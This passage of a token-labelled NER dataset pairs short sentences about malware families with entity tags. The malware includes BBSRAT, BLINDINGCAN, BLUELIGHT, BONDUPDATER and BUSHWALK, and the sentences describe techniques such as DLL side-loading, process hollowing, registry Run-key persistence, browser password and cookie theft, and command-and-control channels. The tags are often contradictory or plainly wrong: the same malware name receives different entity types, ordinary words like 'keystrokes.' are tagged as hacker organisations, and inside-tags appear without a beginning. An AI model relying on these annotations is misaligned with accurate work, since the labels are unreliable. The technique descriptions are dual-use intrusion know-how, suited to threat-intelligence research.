- "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "B-SecTeam", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "side-loading", - "has", - "been", - "used", - "to", - "execute", - "BBSRAT", - "through", - "a", - "legitimate", - "Citrix", - "executable,", - "ssonsvr.exe.", - "The", - "Citrix", - "executable", - "was", - "dropped", - "along", - "with", - "BBSRAT", - "by", - "the", - "dropper." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BBSRAT", - "uses", - "Expand", - "to", - "decompress", - "a", - "CAB", - "file", - "into", - "executable", - "content." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "delete", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "list", - "file", - "and", - "directory", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "has", - "been", - "seen", - "loaded", - "into", - "msiexec.exe", - "through", - "process", - "hollowing", - "to", - "hide", - "its", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "has", - "been", - "loaded", - "through", - "DLL", - "side-loading", - "of", - "a", - "legitimate", - "Citrix", - "executable", - "that", - "is", - "set", - "to", - "persist", - "through", - "the", - "Registry", - "Run", - "key", - "location", - "<code>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "start,", - "stop,", - "or", - "delete", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "uses", - "a", - "custom", - "encryption", - "algorithm", - "on", - "data", - "sent", - "back", - "to", - "the", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "query", - "service", - "configuration", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "uses", - "GET", - "and", - "POST", - "requests", - "over", - "HTTP", - "or", - "HTTPS", - "for", - "command", - "and", - "control", - "to", - "obtain", - "commands", - "and", - "send", - "ZLIB", - "compressed", - "data", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "modify", - "service", - "configurations." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "uses", - "SSL", - "for", - "encrypting", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "malware", - "contains", - "a", - "secondary", - "fallback", - "command", - "and", - "control", - "server", - "that", - "is", - "contacted", - "after", - "the", - "primary", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "download", - "a", - "file", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "can", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "enumerate", - "running", - "processes", - "and", - "identify", - "their", - "owners." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "periodically", - "take", - "screenshots", - "of", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "collect", - "the", - "processor", - "type,", - "operation", - "system,", - "computer", - "name,", - "and", - "whether", - "the", - "system", - "is", - "a", - "laptop", - "or", - "PC." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "gather", - "the", - "username", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "collect", - "the", - "system", - "`UPTIME`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BISCUIT", - "has", - "a", - "command", - "to", - "launch", - "a", - "command", - "shell", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITSAdmin", - "can", - "be", - "used", - "to", - "create", - "BITS", - "Jobs", - "to", - "launch", - "a", - "malicious", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITSAdmin", - "can", - "be", - "used", - "to", - "create", - "BITS", - "Jobs", - "to", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITSAdmin", - "can", - "be", - "used", - "to", - "create", - "BITS", - "Jobs", - "to", - "upload", - "and/or", - "download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BITSAdmin", - "can", - "be", - "used", - "to", - "create", - "BITS", - "Jobs", - "to", - "upload", - "and/or", - "download", - "files", - "from", - "SMB", - "file", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "has", - "also", - "obfuscated", - "its", - "C2", - "traffic", - "as", - "normal", - "traffic", - "to", - "sites", - "such", - "as", - "Github." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "uses", - "Microsoft’s", - "TechNet", - "Web", - "portal", - "to", - "obtain", - "a", - "dead", - "drop", - "resolver", - "containing", - "an", - "encoded", - "tag", - "with", - "the", - "IP", - "address", - "of", - "a", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "has", - "the", - "capability", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "has", - "the", - "capability", - "to", - "enumerate", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "uses", - "Microsoft’s", - "TechNet", - "Web", - "portal", - "to", - "obtain", - "an", - "encoded", - "tag", - "containing", - "the", - "IP", - "address", - "of", - "a", - "command", - "and", - "control", - "server", - "and", - "then", - "communicates", - "separately", - "with", - "that", - "IP", - "address", - "for", - "C2.", - "If", - "the", - "C2", - "server", - "is", - "discovered", - "or", - "shut", - "down,", - "the", - "threat", - "actors", - "can", - "update", - "the", - "encoded", - "IP", - "address", - "on", - "TechNet", - "to", - "maintain", - "control", - "of", - "the", - "victims’", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "has", - "the", - "capability", - "to", - "discover", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BLACKCOFFEE", - "has", - "the", - "capability", - "to", - "create", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "been", - "signed", - "with", - "code-signing", - "certificates", - "such", - "as", - "CodeRipper." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "uploaded", - "files", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "used", - "AES", - "and", - "XOR", - "to", - "decrypt", - "its", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "obfuscated", - "code", - "using", - "Base64", - "encoding." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "sent", - "user", - "and", - "system", - "information", - "to", - "a", - "C2", - "server", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "deleted", - "itself", - "and", - "associated", - "artifacts", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "can", - "search,", - "read,", - "write,", - "move,", - "and", - "execute", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "downloaded", - "files", - "to", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "lured", - "victims", - "into", - "executing", - "malicious", - "macros", - "embedded", - "within", - "Microsoft", - "Office", - "documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "attempted", - "to", - "hide", - "its", - "payload", - "by", - "using", - "legitimate", - "file", - "names", - "such", - "as", - "\"iconcache.db\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "used", - "Rundll32", - "to", - "load", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "loaded", - "and", - "executed", - "DLLs", - "in", - "memory", - "during", - "runtime", - "on", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "been", - "packed", - "with", - "the", - "UPX", - "packer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "been", - "delivered", - "by", - "phishing", - "emails", - "containing", - "malicious", - "Microsoft", - "Office", - "documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "encoded", - "its", - "C2", - "traffic", - "with", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "encrypted", - "its", - "C2", - "traffic", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "collected", - "from", - "a", - "victim", - "machine", - "the", - "system", - "name,", - "processor", - "information,", - "OS", - "version,", - "and", - "disk", - "information,", - "including", - "type", - "and", - "free", - "space", - "available." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "collected", - "the", - "victim", - "machine's", - "local", - "IP", - "address", - "information", - "and", - "MAC", - "address." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "modified", - "file", - "and", - "directory", - "timestamps." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "used", - "HTTPS", - "over", - "port", - "443", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLINDINGCAN", - "has", - "executed", - "commands", - "via", - "cmd.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "zip", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "has", - "encoded", - "data", - "into", - "a", - "binary", - "blob", - "using", - "XOR." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "use", - "different", - "cloud", - "providers", - "for", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Area", - "I-Org", - "I-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "collect", - "passwords", - "stored", - "in", - "web", - "browers,", - "including", - "Internet", - "Explorer,", - "Edge,", - "Chrome,", - "and", - "Naver", - "Whale." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "B-Way", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "has", - "a", - "XOR-encoded", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "has", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "uninstall", - "itself." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "enumerate", - "files", - "and", - "collect", - "associated", - "metadata." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "download", - "additional", - "files", - "onto", - "the", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "collect", - "process", - "filenames", - "and", - "SID", - "authority", - "level." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "has", - "captured", - "a", - "screenshot", - "of", - "the", - "display", - "every", - "30", - "seconds", - "for", - "the", - "first", - "5", - "minutes", - "after", - "initiating", - "a", - "C2", - "loop,", - "and", - "then", - "once", - "every", - "five", - "minutes", - "thereafter." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "collect", - "a", - "list", - "of", - "anti-virus", - "products", - "installed", - "on", - "a", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "harvest", - "cookies", - "from", - "Internet", - "Explorer,", - "Edge,", - "Chrome,", - "and", - "Naver", - "Whale", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "check", - "to", - "see", - "if", - "the", - "infected", - "machine", - "has", - "VM", - "tools", - "running." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "has", - "collected", - "the", - "computer", - "name", - "and", - "OS", - "version", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "collect", - "IP", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "collect", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "collect", - "the", - "local", - "time", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BLUELIGHT", - "can", - "use", - "HTTP/S", - "for", - "C2", - "using", - "the", - "Microsoft", - "Graph", - "API." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "can", - "use", - "DNS", - "and", - "TXT", - "records", - "within", - "its", - "DNS", - "tunneling", - "protocol", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "uses", - "a", - "DGA", - "to", - "communicate", - "with", - "command", - "and", - "control", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "uses", - "<code>-windowstyle", - "hidden</code>", - "to", - "conceal", - "a", - "PowerShell", - "window", - "that", - "downloads", - "a", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "can", - "download", - "or", - "upload", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "is", - "written", - "in", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "persists", - "using", - "a", - "scheduled", - "task", - "that", - "executes", - "every", - "minute." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BONDUPDATER", - "can", - "read", - "batch", - "commands", - "in", - "a", - "file", - "sent", - "from", - "its", - "C2", - "server", - "and", - "execute", - "them", - "with", - "cmd.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BOOSTWRITE", - "has", - "been", - "signed", - "by", - "a", - "valid", - "CA." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BOOSTWRITE", - "has", - "exploited", - "the", - "loading", - "of", - "the", - "legitimate", - "Dwrite.dll", - "file", - "by", - "actually", - "loading", - "the", - "gdi", - "library,", - "which", - "then", - "loads", - "the", - "gdiplus", - "library", - "and", - "ultimately", - "loads", - "the", - "local", - "Dwrite", - "dll." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "BOOSTWRITE", - "has", - "used", - "a", - "a", - "32-byte", - "long", - "multi-XOR", - "key", - "to", - "decode", - "data", - "inside", - "its", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BOOSTWRITE", - "has", - "encoded", - "its", - "payloads", - "using", - "a", - "ChaCha", - "stream", - "cipher", - "with", - "a", - "256-bit", - "key", - "and", - "64-bit", - "Initialization", - "vector", - "(IV)", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BOOSTWRITE", - "has", - "used", - "the", - "DWriteCreateFactory()", - "function", - "to", - "load", - "additional", - "modules." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BOOTRASH", - "is", - "a", - "Volume", - "Boot", - "Record", - "(VBR)", - "bootkit", - "that", - "uses", - "the", - "VBR", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BOOTRASH", - "has", - "used", - "unallocated", - "disk", - "space", - "between", - "partitions", - "for", - "a", - "hidden", - "file", - "system", - "that", - "stores", - "components", - "of", - "the", - "Nemesis", - "bootkit." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "BS2005", - "uses", - "Base64", - "encoding", - "for", - "communication", - "in", - "the", - "message", - "body", - "of", - "an", - "HTTP", - "request." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUBBLEWRAP", - "can", - "communicate", - "using", - "SOCKS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BUBBLEWRAP", - "collects", - "system", - "information,", - "including", - "the", - "operating", - "system", - "version", - "and", - "hostname." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUBBLEWRAP", - "can", - "communicate", - "using", - "HTTP", - "or", - "HTTPS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BUSHWALK", - "can", - "embed", - "into", - "the", - "legitimate", - "`querymanifest.cgi`", - "file", - "on", - "compromised", - "Ivanti", - "Connect", - "Secure", - "VPNs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUSHWALK", - "can", - "Base64", - "decode", - "and", - "RC4", - "decrypt", - "malicious", - "payloads", - "sent", - "through", - "a", - "web", - "request’s", - "command", - "parameter." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUSHWALK", - "can", - "write", - "malicious", - "payloads", - "sent", - "through", - "a", - "web", - "request’s", - "command", - "parameter." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUSHWALK", - "can", - "encrypt", - "the", - "resulting", - "data", - "generated", - "from", - "C2", - "commands", - "with", - "RC4." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BUSHWALK", - "can", - "modify", - "the", - "`DSUserAgentCap.pm`", - "Perl", - "module", - "on", - "Ivanti", - "Connect", - "Secure", - "VPNs", - "and", - "either", - "activate", - "or", - "deactivate", - "depending", - "on", - "the", - "value", - "of", - "the", - "user", - "agent", - "in", - "incoming", - 